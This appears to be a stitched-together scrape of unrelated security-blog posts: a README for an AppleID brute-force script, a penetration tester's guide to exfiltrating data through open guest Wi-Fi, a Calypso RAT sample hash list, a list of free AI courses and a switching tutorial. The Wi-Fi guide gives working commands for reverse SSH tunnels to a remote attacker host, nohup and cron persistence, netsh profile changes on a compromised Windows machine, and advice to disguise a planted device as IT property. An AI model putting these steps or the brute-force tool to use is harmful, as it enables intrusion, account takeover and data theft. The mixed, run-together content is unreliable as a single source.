
iCloudBrutter - AppleID Bruteforce

iCloudBrutter is a simple python (3.x) script to perform basic bruteforce attack againts AppleID.

Usage of iCloudBrutter for attacking targets without prior mutual consent is illegal. iCloudBrutter developer not responsible to any damage caused by iCloudBrutter.

$ git clone https://github.com/m4ll0k/iCloudBrutter.git
$ cd iCloudBrutter
$ pip3 install requests,urllib3,socks
$ python3 icloud.py

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Backchannel Data Exfiltration Via Guest/R&D Wi-Fi

Often times I find unprotected wireless access points with unfettered access to the internet for research or guest access purposes. This is generally through an unauthenticated portal or a direct cable connection. When questioning the business units they explain a low value network, which is simply a internet pass thru separate from the internal network. This sounds reasonable and almost plausible however I usually explain the dangers of having company assets on an unprotected Wi-Fi and the dangers of client side exploits and MITM attacks. But there are a few other plausible scenarios one should be aware of that may scare you a bit more then the former discussion.

What about using OpenWifi as a backchannel data exfiltration medium?

An open Wi-Fi is a perfect data exfiltration medium for attackers to completely bypass egress filtering issues, DLP, proxy filtering issues and a whole bunch of other protection mechanisms in place to keep attackers from sending out shells and moving data between networks. This can easily be accomplished via dual homing your attack host utilizing multiple nic cards which are standard on almost all modern machines. Whether this is from physical access breach or via remote compromise the results can be deadly. Below are a few scenarios, which can lead to undetectable data exfiltration.

Scenario 1: (PwnPlug/Linux host with Wi-Fi adaptor)
The first useful scenario is when a physical perimeter has been breached and a small device from http://pwnieexpress.com/ known as a pwn-plug is installed into the target network or a linux host with a wireless card. I usually install pwn-plug's inside a closet or under a desk somewhere which is not visible and allows a network connection out to an attacker owned host. Typically its a good idea to label the small device as "IT property and Do Not Remove". This will keep a casual user from removing the device. However if there is network egress and proxy filtering present then our network connection may never reach a remote host. At this point your physical breach to gain network access to an impenetrable network perimeter will fail. Unless there happens to be an open cable Wi-Fi connection to an "inconsequential R&D network".

By simply attaching an Alpha card to the pwnplug you can connect to the R&D wireless network. You can then use this network as your outgoing connection and avoid corporate restrictions regarding outbound connections via metasploit or ssh. I have noticed that most clients these days are running heavy egress filtering and packet level protocol detection, which stops outbound connections. Rather then play the obfuscation game i prefer to bypass the restrictions all together using networks which have escaped corporate policy.

You can automate the following via a script if you wardrive the facility prior to entrance and gain insight into the open wireless network, or you can also configure the plug via serial connection on site provided you have time.

Connect to wifi:
ifconfig wlan0 up
iwconfig wlan0 essid [targetNetworkSSID]
dhclient wlan0

Run a reverse SSH tunnel:
ssh -R 3000: root@remoteHost.com

On the remote host you can retrieve your shell:
ssh -p 3000 User@localhost

Once you have authenticated with the pwnplug via your local host port forward you now have access into the internal network via an encrypted tunnel which will not be detected and fully bypass any corporate security restrictions. You can take this a bit further and setup some persistence in case the shell goes down.. This can be done via bash and nohup if you setup some ssh keys to handle authentication.. One example could be the following script:

Your bash script: 
while true
 ssh -R 3000: root@remoteHost.com
 sleep 10

Run this with nohup like this:
nohup ./shell.sh &

Another simple way would be to setup a cron job to run a script with your ssh command on a specified interval for example every 5 minutes like so:

Cron job for every 5 minutes: 
*/5 * * * * /shell.sh

Scenario 2: (Remote Windows Compromise)
The second scenario is that of a compromised modern windows machine with a wireless card, this can be used to make a wireless connection outbound similar to the first scenario which will bypass restrictions by accessing an unrestricted network. As shown in "Vista Power Tools" paper written by Josh Wright you can use modern windows machines cards via the command line.

Below are the commands to profile the networks and export a current profile then import a new profile for your target wireless network. Then from there you can connect and use that network to bypass corp restrictions provided that wireless network doesn't have its own restrictions.

Profile Victim machine and extract a wireless profile: 
netsh wlan show interfaces
netsh wlan show networks mode=bssid
netsh wlan show profiles
netsh wlan export profile name="CorpNetwork"

Then modify that profile to meet the requirements needed for the R&D network and import it into the victim machine.

Upload a new profile and connect to the network: 
netsh wlan add profile filename="R&D.xml"
netsh wlan show profiles
netsh wlan connect name="R&D"

If you check out Josh's excellent paper linked above you will also find ways of bridging between ethernet and wireless adaptors along with lots of other ideas and useful information.

I just got thinking the other day of ways to abuse so called guest or R&D networks and started writing down a few ideas based on scenarios which play out time and time again while penetration testing networks and running physical breach attacks. I hear all to often that a cable connection not linked to the corporate network is totally safe and I call bullshit on that.

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APT Calypso RAT, Flying Dutchman Samples


 Attackers exploit Windows SMB vulnerability CVE-2017-0143 or use stolen credentials to gain access, deploy the custom Calypso RAT and use it to upload other tools such as Mimikatz, EternalBlue and EternalRomance. They move laterally and steal data.


             Other malware


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17e05041730dcd0732e5b296db16d757b6c21c26aef75ad709f6c9cfa84bfa15b7ee709588382ce4bc3544a04bceb661f3301405d8ad5b160747241d6b2a8d88bf6292e8pe exeCalypso RAT Dropper
1ed72c14c4aab3b66e830e16ef90b37beebff21def49af4e85c26523af2ad659125a07a09db50ac06bd3746483c89f9ddc0d0a34f107d140d9e47582e17a7fec945403eacoal.exepe exeCalypso RAT Dropper
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69322703b8ef9d490a20033684c28493e6a3b43acdaa824f3280095b10798ea341839f7d43f0460df8989f13c98fa6e0f203680d97705d99f92fe9797691be6177f5fd41RasCon.dllpe dllCalypso RAT Dropper
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6347e42f49a86aff2dea7c8bf455a52a281583aca23f8fd8745dd88a600cbfc578d819859a13957ec022b86c3c1c99f48b2a81af85590e0e36efc1c05aa4f0600ea21545HIDMgr.dllpe dllCalypso RAT Dropper
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e3e61f30f8a39cd7aa25149d0f8af5efc4dc7519bccc24c53794bf9178e4a4d0823875c34479d01cedbb3e9b10f5c7301b75ea494c3ac171c5177bdcc263b89a3f24f207MPSSVC.dllpe dllCalypso RAT Payload

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5 Free Online Courses To Learn Artificial Intelligence

We are living in the era of fourth industrial revolution(4IR), where Artificial intelligence has a significant role to play. This 4IR technology embedded within societies and even into the human body. From Computer enthusiasts to common people, everyone should be aware and learn this breakthrough technology.
We think about gigantic Robots from Transformers when we hear about Artificial Intelligence(AI) which is a fiction in the past but a fact today, capable of transforming the whole tech world. The field of AI consists of more than Robots such as personal assistants, self-driving cars, apprenticeship learning, behavior cloning and so on. To learn about this advanced technology, thanks to the online learning resources which offers great content to get started with artificial intelligence.

Here are the 5 free e-learning courses on Artificial Intelligence

1. UC Berkeley CS188 Intro to AI

Get started with UC Berkeley AI course, this course is absolutely for beginners who are unaware of Artificial intelligence. It doesn't need any prior computer knowledge to know about AI. UC Berkeley allows anyone to learn this course for free. This course is systematically presented and consists of the following:
  • Course Schedule
  • Complete sets of Lecture Slides and Videos
  • Interface for Electronic Homework Assignments
  • Section Handouts
  • Specs for the Pacman Projects
  • Source files and PDFs of past Berkeley CS188 exams
  • Form to apply for edX hosted autograders for homework and projects (and more)
  • Contact information
Aside from this, you can also browse the following courses as well from UC Berkeley that are part of AI course:
  • Machine Learning: CS189, Stat154
  • Intro to Data Science: CS194-16
  • Probability: EE126, Stat134
  • Optimization: EE127
  • Cognitive Modeling: CogSci131
  • Machine Learning Theory: CS281A, CS281B
  • Vision: CS280
  • Robotics: CS287
  • Natural Language Processing: CS288

2. Artificial Intelligence: Principles and Techniques

This course is offered by Stanford with great content that includes topics, videos, assignments, projects, and exams. The whole course mainly focuses on the complex real-world problems and try to find similarity between web search, speech recognition, face recognition, machine translation, autonomous driving, and automatic scheduling. Here you will learn the foundational principles of AI and implement some the AI systems. The goal of this course is to help you tackle the real-world situations with the help of AI tools. So, it is the best for the beginner to get started with AI.

3. Learn with GOOGLE AI

Who will dislike the course from Google? absolutely no one. This company is one of the early adopters of AI has a lot to offer to learners. Learn with Google AI is an education platform for people at all experience levels, it is free to access and browse content. The education resources provided by Google is from the machine learning experts of the company. These resources are the collections of lessons, tutorials, and Hands-on exercises that help you start learning, building, and problem-solving.

4. MIT 6.S094: Deep Learning for Self-Driving Cars

This course gives the practical overview of Deep Learning and AI. It is the course for beginners, also for the people who are getting started with Machine Learning. The course also offers a lot of benefits to the experienced and advanced researchers in the field deep learning. This MIT's course takes people into the journey of Deep Learning with the applied theme of building Self-Driving cars. However, the course also offers slides and videos to engage the learners.

5. Fundamentals of Deep Learning for Computer Vision

This course is offered by Nvidia and Nvidia Deep learning Institute. Computer Vision is one of the disciplines of AI that acquire, analyze, process, and understand images. The course is completely free and everyone who is enthusiast about AI can access and learn the course. It is a hands-on course that able to provide basics of deep learning and deployment of neural networks. With this. you will also learn the following:
  • Identify the ingredients required to start a Deep Learning project.
  • Train a deep neural network to correctly classify images it has never seen before.
  • Deploy deep neural networks into applications.
  • Identify techniques for improving the performance of deep learning applications.
  • Assess the types of problems that are candidates for deep learning.
  • Modify neural networks to change their behavior.
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Networking | Routing And Switching | Tutorial 4 | 2018

Welcome to my 4th new tutorial of the series of networking. In this blog you'll the content about network switches. You'll learn about how to make a communication successful and secure in the same network (LAN) by using STP. As Spanning tree protocol (STP) we used in multi-switched networks. Why we use this protocol in multi-switched network etc.

What is Switch? 

A switch is an intelligent device used to connect multiple devices within the same network. The intelligence of is that it requires Media Access Control (MAC) address for communication and doesn't allow broadcast.  Let's understand the whole thing by a little example, consider there is a network having 3 end devices name Device-A, Device-B,Device-C connected with each other respectively with the help of switch. When a Device-A sends data to Device-C so that data will only forwarded by switch to Device-C not to Device-B.

What is Media Access Control (MAC) address?

A Media Access Control (MAC) address is 48-bit unique physical address given to network interface controller (NIC) or network adapter, for communication within the same network which is given by its manufacturer. It is made up of hexadecimal numbers like a1:b1:cc:ac:2e:f1.

What is STP?

STP stands for Spanning tree protocol which is basically used in bridge and switches to prevent loops when you have a redundant links in the Ethernet networks. If the loop is present in the Ethernet network so the whole network will suffer because there will MAC instability in the MAC table,  duplicate frames generation and so on. Let's move to the video for further detail.